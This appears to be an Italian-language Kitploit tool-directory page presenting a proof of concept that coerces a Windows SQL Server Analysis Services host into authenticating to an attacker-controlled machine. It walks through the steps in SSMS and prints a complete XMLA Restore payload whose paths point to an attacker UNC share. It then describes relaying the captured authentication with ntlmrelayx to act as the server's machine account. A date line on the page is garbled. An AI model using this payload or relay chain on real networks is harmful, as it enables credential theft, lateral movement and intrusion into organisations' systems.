Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
MSSQL-Analysis-Coerce — Una tecnica per forzare un SQL Server Windows ad autenticarsi su una macchina arbitraria. | Kitploit
Strumenti/GitHubGitHub/p0dalirius/mssql-analysis-coerce
ExploitMovimento LateralePost-ExploitPenetration TestingRed TeamingAttacco Avversario
GitHubp0dalirius/mssql-analysis-coerce

MSSQL-Analysis-Coerce

Una tecnica per forzare un SQL Server Windows ad autenticarsi su una macchina arbitraria.

Vedi Repository
133132 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

MSSQL Analysis Services - Autenticazione forzata

Una tecnica per forzare un SQL Server Windows ad autenticarsi su una macchina arbitraria.

Questa proof of concept è co-scritta da:

  • Podalirius: Iscritti al canale YouTube
  • Worty:

Prova di concetto

Per innescare l'autenticazione come account della macchina locale, dobbiamo connetterci al SQL Server remoto utilizzando le credenziali utente:

Quindi selezioneremo "Restore" per ripristinare il database da un determinato file.

Per generare il file XMLA, inserisci il percorso di un file casuale nel campo "Backup File" e fai clic su OK.

Quindi modifica il percorso (impostato su un file casuale) e sostituiscilo con un percorso UNC verso il tuo server di attacco (ad esempio \\192.168.128\SYSVOL\db.abf)

Query XMLA della prova di concetto (poc.xmla):

root@kitploit:~
<Restore xmlns="http://schemas.microsoft.com/analysisservices/2003/engine">
    <File>\\192.168.2.51\SYSVOL\db.abf</File>
    <DatabaseName>\\192.168.2.51\SYSVOL\db.abf</DatabaseName>
    <DbStorageLocation xmlns="http://schemas.microsoft.com/analysisservices/2008/engine/100/100">\\192.168.2.51\SYSVOL\db.abf</DbStorageLocation>
</Restore>

E otteniamo un'autenticazione dall'account della macchina locale del SQL Server:

Relaying per la vittoria

Una volta ottenuta l'autenticazione, possiamo inoltrarla con ntlmrelayx per eseguire molte azioni per conto del computer SQL01$.

Tutto ciò è interessante, ma è complicato innescare questa autenticazione forzata da una macchina Linux attaccante, poiché non abbiamo accesso a SQL Server Management Studio (SSMS).

Riferimenti

  • https://docs.microsoft.com/en-us/sql/database-engine/install-windows/install-sql-server?view=sql-server-ver15
  • https://social.technet.microsoft.com/wiki/contents/articles/13106.sql-server-frequently-used-ports.aspx
  • https://docs.microsoft.com/en-us/answers/questions/274512/connecting-to-azure-analysis-services-using-python.html
Scarica lo strumento